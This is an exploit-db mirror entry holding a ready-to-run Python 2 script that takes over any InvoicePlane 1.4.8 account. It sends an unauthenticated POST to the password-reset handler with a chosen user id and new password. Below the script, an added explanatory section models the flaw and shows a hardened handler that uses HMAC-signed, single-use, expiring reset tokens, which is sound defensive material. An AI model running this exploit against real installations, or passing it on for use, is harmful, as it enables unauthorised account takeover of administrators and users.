exploit-db-mirror/platforms/php/webapps/40752.py
Offensive Security 8a72733f20 DB: 2016-11-12
1 new exploits
InvoicePlane 1.4.8 - Password Reset
2016-11-12 05:01:20 +00:00

# Exploit Title: InvoicePlane v1.4.8 Incorrect Access Control for password reset
# Date: 12-11-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: https://invoiceplane.com
# Software Link: https://invoiceplane.com/download/v1.4.8
# Version: v1.4.8
# Tested on: ubuntu 16.04 LTS
# Description: An unauthenticated user can POST to
# /index.php/sessions/passwordreset setting a new password for any user
import urllib2, urllib  # Python 2 standard library
#set parameters here
user_id = '1'                   # numeric id of the account whose password is overwritten
new_password = 'haxor'          # password that will be set for that account
baseUrl = 'http://localhost/'   # InvoicePlane web root, with trailing slash
####
# Form fields the reset handler expects; no session cookie and no reset token are sent
data = urllib.urlencode({'user_id': user_id,
                         'new_password': new_password,
                         'btn_new_password': '1'})
# Supplying a body makes urllib2 issue a POST rather than a GET
req = urllib2.Request(baseUrl + 'index.php/sessions/passwordreset', data)
response = urllib2.urlopen(req)
print response.getcode()  # 200 indicates the handler accepted the request
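The handler the advisory describes accepts a user_id and a new_password from any caller and trusts the user_id to pick the account. The block below is an added example written for this page, not InvoicePlane's code: it models that broken access-control pattern as a plain Python 3 function, then shows one hardened alternative in which a single-use, expiring, HMAC-signed reset token (issued out of band, for instance by e-mail) decides which account may be changed. The user store, the field names other than the three in the exploit, the token format and the status codes are all constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
import time


def make_store():
    """Constructed user table for the demo: user_id -> current password."""
    return {"1": "admin-original", "2": "user-original"}


def vulnerable_passwordreset(store, post):
    """Models the flaw in the advisory: the POST body alone selects the
    account and the password, with no session and no proof of ownership.
    Returns an HTTP-like status code."""
    if post.get("btn_new_password") != "1":
        return 400
    user_id = post.get("user_id")
    new_password = post.get("new_password")
    if user_id not in store or not new_password:
        return 400
    store[user_id] = new_password  # anyone can reach this line
    return 200


class ResetTokens:
    """Reset tokens bound to one user id, signed with a server secret,
    time-limited and single use. Assumed design, not InvoicePlane's."""

    def __init__(self, secret, ttl_seconds=900):
        self.secret = secret
        self.ttl = ttl_seconds
        self.issued = {}  # token_id -> (user_id, expiry); a DB row in a real app

    def _sign(self, token_id, user_id):
        # The user id is part of the signed message, so swapping user_id in
        # the POST invalidates the signature.
        msg = (token_id + "\x00" + user_id).encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def issue(self, user_id, now=None):
        now = time.time() if now is None else now
        token_id = secrets.token_urlsafe(16)
        self.issued[token_id] = (user_id, now + self.ttl)
        return token_id + "." + self._sign(token_id, user_id)

    def consume(self, token, user_id, now=None):
        now = time.time() if now is None else now
        token_id, _, sig = token.partition(".")
        expected = self._sign(token_id, user_id)
        if not hmac.compare_digest(sig, expected):
            return False  # forged, truncated, or issued for another user
        record = self.issued.pop(token_id, None)  # pop: a token works once
        if record is None:
            return False  # already used or never issued
        bound_user_id, expiry = record
        return bound_user_id == user_id and now <= expiry


def hardened_passwordreset(store, tokens, post, now=None):
    """Same form fields plus a reset token. The token, not the caller's
    claimed user_id, authorises the change."""
    if post.get("btn_new_password") != "1":
        return 400
    user_id = post.get("user_id", "")
    new_password = post.get("new_password")
    if not tokens.consume(post.get("token", ""), user_id, now):
        return 403  # uniform refusal: no hint whether the user exists
    if user_id not in store or not new_password:
        return 400
    store[user_id] = new_password
    return 200


def demo():
    """Replays the exploit's POST against both handlers."""
    post = {"user_id": "1", "new_password": "haxor", "btn_new_password": "1"}
    vuln_store = make_store()
    vuln_status = vulnerable_passwordreset(vuln_store, post)
    hard_store = make_store()
    tokens = ResetTokens(b"server-side-secret")  # assumed secret
    hard_status = hardened_passwordreset(hard_store, tokens, post)
    return {
        "vulnerable": (vuln_status, vuln_store["1"]),
        "hardened": (hard_status, hard_store["1"]),
    }


if __name__ == "__main__":
    print(demo())
```

The hardened variant checks the token before looking at the store so that an attacker probing user ids gets the same 403 for every value, and it pops the token record on first use so a leaked reset link cannot be replayed. Binding the user id into the HMAC is what closes the exact gap the exploit uses: the attacker's ability to choose user_id freely.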